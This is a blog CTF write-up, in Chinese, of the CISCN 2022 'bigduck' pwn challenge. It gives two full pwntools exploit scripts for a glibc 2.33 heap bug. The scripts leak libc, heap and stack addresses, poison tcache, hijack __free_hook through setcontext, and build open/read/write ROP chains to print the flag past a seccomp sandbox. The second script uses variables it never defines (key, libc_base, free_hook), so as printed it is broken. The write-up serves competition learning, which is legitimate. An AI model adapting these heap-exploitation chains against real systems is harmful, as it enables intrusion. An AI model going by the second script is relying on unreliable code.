ciscn 2022 华东北分区赛pwn bigduck

最新推荐文章于 2024-04-05 16:57:27 发布
最新推荐文章于 2024-04-05 16:57:27 发布
阅读量695 收藏 1
点赞数 4
分类专栏: wp 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/125561195
版权

ciscn 2022 华东北分区赛pwn bigduck

这个是2.33下的,2.33下有free_hook 和 malloc_hook。这题开启了沙盒,禁用了execve
在这里插入图片描述
所以考虑orw攻击方法。这里有一个小坑点,2.33下通过unsorted bin泄露的时候,main_arena那里的低字节是\x00,所以直接show的话会show不出来。在show前利用edit将低字节改为\x01即可。最后算libc的时候 - 1即可。两种攻击思路,第一种借助environ泄露出stack然后改edit的ret为orw即可,第二种劫持hook为万能gadget(直接拿2.31的模板
另外还有一个小坑点,pop_rdx_ret直接用libc_base + libc.search(asm(‘pop rdx;ret;’)).next()会不成功,所以笔者直接用ropgadget找的
在这里插入图片描述

第一种攻击方法 借助environ

和duck一样的思路,最后的rop链改成orw即可。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('192.168.166.139', 58011)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Choice: '

def add():
    r.sendlineafter(menu, '1')

def show(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Idx:', str(index))

def delete(index):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Idx:', str(index))

def edit(index, size, content):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Idx:', str(index))
    r.sendlineafter('Size:', str(size))
    r.sendafter('Content:', content)

for i in range(9):
    add()

for i in range(8):
    delete(i)

edit(7, 0x10, b'\x01')
show(7)
main_arena_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 1 - 96
li('main_arena_addr = ' + hex(main_arena_addr))
malloc_hook = main_arena_addr - 0x10
li('malloc_hook = ' + hex(malloc_hook))
libc = ELF('./libc.so.6')
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
li('free_hook = ' + hex(free_hook))
edit(7, 0x10, b'\x00')

show(0)
r.recvuntil('\n')
key = u64(r.recv(5).ljust(8, b'\x00'))
heap_base = key << 12
li('heap_base = ' + hex(heap_base))
environ = libc_base + libc.sym['environ']
li('environ = ' + hex(environ))

for i in range(5):
    add() #9-13

p1 = p64(key ^ environ) + p64(0)
edit(1, 0x10, p1)
add()#14
add()#15

show(15)
stack_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 0x138
li('stack_addr = ' + hex(stack_addr))

delete(9)
delete(10)
edit(10, 0x10, p64(key ^ stack_addr) + p64(0))
add()#16
add()#17

pop_rdi_ret = libc_base + libc.search(asm('pop rdi;ret;')).__next__()
#pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
pop_rsi_ret = libc_base + 0x000000000002a4cf
#pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()
pop_rdx_ret = 0x00000000000c7f32 + libc_base
read_addr = libc_base + libc.sym['read']
open_addr = libc_base + libc.sym['open']
write_addr = libc_base + libc.sym['write']
flag_addr = stack_addr + 0x10


p2 = p64(0) * 2
p2 += b'./flag\x00\x00'
# open('./flag', 0)
p2 += p64(pop_rdi_ret) + p64(flag_addr) + p64(pop_rsi_ret) + p64(0) + p64(open_addr)

# read(3, stack_addr - 0x200, 0x50)
p2 += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(stack_addr - 0x200) + p64(pop_rdx_ret) + p64(0x50) + p64(read_addr)

# write(1, stack_addr - 0x200, 0x50)
p2 += p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(stack_addr - 0x200) + p64(pop_rdx_ret) + p64(0x50) + p64(write_addr)

edit(17, 0x100, p2)

r.interactive()

第二种攻击方法 劫持hook为万能gadget

直接模板走就可以了,这里笔者就不说原理了,想理解原理的直接去看其他师傅关于orw的教程

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('192.168.166.139', 58011)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Choice: '

def add():
    r.sendlineafter(menu, '1')

def show(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Idx:', str(index))

def delete(index):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Idx:', str(index))

def edit(index, size, content):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Idx:', str(index))
    r.sendlineafter('Size:', str(size))
    r.sendafter('Content:', content)

for i in range(9):
    add()

for i in range(8):
    delete(i)

edit(7, 0x10, b'\x01')
show(7)
main_arena_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 1 - 96
li('main_arena_addr = ' + hex(main_arena_addr))

heap_base = key << 12
li('heap_base = ' + hex(heap_base))

for i in range(5):
    add() #9-13

p1 = p64(key ^ free_hook) + p64(0)
edit(1, 0x10, p1)
add()   #14
add()   #15

gadget = libc_base + 0x14a0a0
# 0x000000000014a0a0: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
read_addr = libc_base + libc.sym['read']

edit(15, 0x8, p64(gadget))

frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = free_hook
frame.rdx = 0x200
frame.rsp = free_hook + 8
frame.rip = read_addr

setcontext = libc_base + libc.sym['setcontext'] + 61

p2 = p64(0) + p64(heap_base + 0x3b0) + p64(0) * 2 + p64(setcontext) + bytes(frame)[0x28:]
edit(14, 0x100, p2)
delete(14)

open_addr = libc_base + libc.sym['open']
write_addr = libc_base + libc.sym['write']
pop_rdi_ret = libc_base + libc.search(asm('pop rdi;ret;')).__next__()
#pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
pop_rsi_ret = libc_base + 0x000000000002a4cf
#pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()
pop_rdx_ret = 0x00000000000c7f32 + libc_base

p3 = b'./flag\x00\x00'

# open('./flag', 0)
p3 += p64(pop_rdi_ret) + p64(free_hook) + p64(pop_rsi_ret) + p64(0) + p64(open_addr)

# read(3, free_hook + 0x200, 0x50)
p3 += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(free_hook + 0x200) + p64(pop_rdx_ret) + p64(0x50) + p64(read_addr)

# write(1, free_hook + 0x200, 0x50)
p3 += p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(free_hook + 0x200) + p64(pop_rdx_ret) + p64(0x50) + p64(write_addr)
r.send(p3)

r.interactive()
z1r0.
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2023 ciscn 东北分区 pwn cgi
z1r0的博客
07-10 421
模拟了一个http协议的交互。
2021 ciscn 分区 pwn note
yongbaoii的博客
09-02 373
libc 2.31 保护是都拉上的。 刚开始有个花指令,通过一定的调整,再反汇编,就得到了正确的结果。 可以看到除了必要的初始化setbuf之外还将4050的地方清空了。 后面我们会看到4050就是存放地址的地方。 add 看一下content的输入 很明显的off by one。 整体结构还是比较清晰的,最多申请三个chunk。 free 清理的很干净。 show show也是正常泄露。 很明显的off by one,我们的常规思路也就是overlap或者unlink。 因为这里泄露不了基地址,所以我
CISCN 2022 东北 blue
最新发布
qq_60209620的博客
04-05 206
提取码: Ya0o。
CISCN2021 西北分区 Web xb_web_flask_trick
feng的博客
06-08 765
前言 6.5号去了兰州打了分区,4道Web出了web1和web4,web2和web3都不会。这题flask是web3,讲道理对我这种对flask不熟悉的弟弟来说还是挺难的,比的时候只有西电的一个队伍出了。今天晚上在学长的帮助下终于出了这道题,也是学到了很多的东西。 源码 import os from flask import Flask, request, abort, session app = Flask(__name__) app.config["SECRET_KEY"] = os.urand
glibc2.31 off-by-null orw 攻击手法刨析
qq_39948058的博客
08-26 842
前言:复习一下glibc2.31版本的orw手法,largebin的残留信息进行unlik,随便弄个题来写的刨析,嘿嘿, 仅large bin chunk的堆块伪造,并即可实现堆块重叠 并large bin attack 任意写攻击TLS结构体中的存放tcache结构体指针的位置,从而可以伪造tcache bin结构体进行任意构造 再通过上述demo任意写控制参数,从而在assert后即可进行栈迁移 glibc2.31 off-by-null orw 攻击手法刨析 Free(3) 3---->un
Bugku S3 AWD排位-9 pwn二进制
08-27
Bugku S3 AWD排位-9 pwn二进制
A pwn challenge in 2022 美团高校 .zip
11-09
资源,竞解决方案,包含完整源码解决方案内容,可用于参学习、参考 美资源,竞解决方案,包含完整源码解决方案内容,可用于参学习、参考 美资源,竞解决方案,包含完整源码解决方案...
网鼎杯2022白虎组题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎杯2022,白虎组,ctf
强网杯2022 pwn 题解析.docx
12-18
强网杯
Pwn入门指北1
08-03
1. 各大主流平台汇编语言,例如x86与arm 2. C语言 5. 计算机组成原理 6. 计算机操作系统 7. 编译原理 1 . 关于环境 2 . 面向萌新的一
[CISCN 2022 东北]听说这是一个二维码
qq_47875210的博客
12-03 658
复现过程如下: 得到密码:Sound from deep --> ,想到工具,拖到工具中,提示输入密码,密码为0和255,可以代表0或者1,所以写个代码,提取一下所有的ip,然后得到二进制字符串 运行后,得到,现在是2进制转图片了,这一步毕竟简单,实现代码如下: 运行效果: 可以看到这两个,比较像,使用在线网站:戳我打开!flag{c736863427be5671102c039d43f0c75b}
pwnable.tw - orw
不急不躁
07-09 3009
简单概览 与 start 不同,该程序使用动态链接 提示仅允许有限的系统调用 open read write 函数 程序运行 哪怕是输入一个字母,程序仍然会出现段错误 检查安全措施 可见栈上开了 CANARY 程序 在 IDA 中反编译可见: 函数 orw_seccomp 反编译: 程序从终端读入内容,存放在 shellcode,然后执行该命令 ...
PWN题[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4181
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
[BUUCTF]PWN——[极客大挑战 2019]Not Bad (orw_shellcode)
mcmuyanga的博客
01-30 2439
[极客大挑战 2019]Not Bad 附件 步骤
2022第十五届全国大学生信息安全竞ciscn)西南区部分WP
Bnessy
07-09 3646
访问题目flag是假的,F12源代码,看到base64解码解码得到flag访问题目,有个aid.php直接访问不行,使用PHP为协议进行读取,input2需要等于Welcone!,这里要使用data协议编码一下,input3可以随便输入 exp: base64解码得到的flag.php得到flag打开题目测试发现是Smarty的模板注入上网搜索发现Smarty模板注入CVE找到一个SmartyCVE集合,https://www.cvedetails.com/vulnerability-list/ve
ciscn2021东北分区
kingdring的博客
06-15 633
ciscn2021东北分区 ++Spirit k1ling 感谢Dazz1e大佬陪我看了很久hh summary 3720pt,rank11 晋级名单还没出,不过大概率是前10进,正好卡掉了,就差一步到罗马,真的意难平… 但是想想自己菜成这样全靠gs带也就释然了一些 这东西就跟S一样,今年没了你就要咽下所有的不甘,然后更加努力,等着明年杀回来 ++Spirit绝不会止步于此 今年进第二轮之后改了个名,k某人想去ciscn,去决之前不改名,不管哪年,flag立这了。 misc 签到 工具
2020 ciscn 东北分区 re题解
Air_cat的博客
09-19 413
唉,居然没师傅出re题,悲伤 此题考点在于抓取或解密出迷宫,这里我用的原函数进行生成,改改几个定义就可以输出迷宫了: #include<stdio.h> #include<string.h> #include<windows.h> #include<string.h> #include<tchar.h> #include<stdint.h > //#+OXJ xnB1 QWT4 9cnW cGFB ZOjn yfZo ZV1m 7+/
ciscn2021 西北分区部分pwn
mishixiaodai的博客
06-07 263
xb_pwn_easy 分析发现是道整数溢出的题,unsigned int8最大数为255,当输入的数字超出255时就会发生溢出。但当时做题我将v4输为0,也可以造成溢出,原因是read的第三个参数v4-1=-1,又read的第三个参数类型是size_t,当输入负值时,会将其转换为无符号数。 利用整数溢出漏洞,可以覆盖age、email、phone,可以将email覆盖为函数的got地址,这样就可以获得函数的地址并且得到libc的基地址。 修改puts函数的got表。一开始我将phone覆盖为puts_
docker pwn
01-29
Docker Pwn是一种使用Docker容器来解决CTF(Capture The Flag)挑战的方法。它提供了一个轻量级的环境,可以在其中运行和调试二进制文件,以便进行漏洞利用和渗透测试。 要使用Docker Pwn,您可以按照以下步骤进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值